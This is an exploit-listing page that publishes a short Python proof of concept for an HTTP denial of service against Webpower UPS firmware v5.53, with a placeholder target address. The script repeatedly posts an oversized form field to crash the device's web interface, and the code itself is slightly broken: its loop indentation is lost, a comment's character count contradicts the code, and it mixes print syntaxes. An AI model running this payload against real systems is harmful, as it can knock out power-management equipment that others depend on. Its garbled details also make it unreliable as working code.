Webpower UPS 5.53 Denial Of Service

2023.03.12

Credit: Yehia Elghaly

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Webpower UPS v5.53 HTTP Denial of Service
# Date: 2023-03-09
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.eaton.com/ae/en-gb.html
# Software Link: https://www.eaton.com/ae/en-gb.html
# Version: Revision v5.53
# Tested on: WebPower UPS
# CVE: N/A
#!/usr/bin/env python
# Webpower UPS v5.53 HTTP Denial of Service.
# Discovered BY (Yehia Elghaly)
import requests
url = 'IP_Address'
data = {'Long_string' : 'a' * 12200}# 19700-character pattern
for i in range (16):
response = requests.post(url, data=data)
print("Response {}: {}".format(i+1, response.status_code))
print "crach"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Webpower UPS 5.53 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.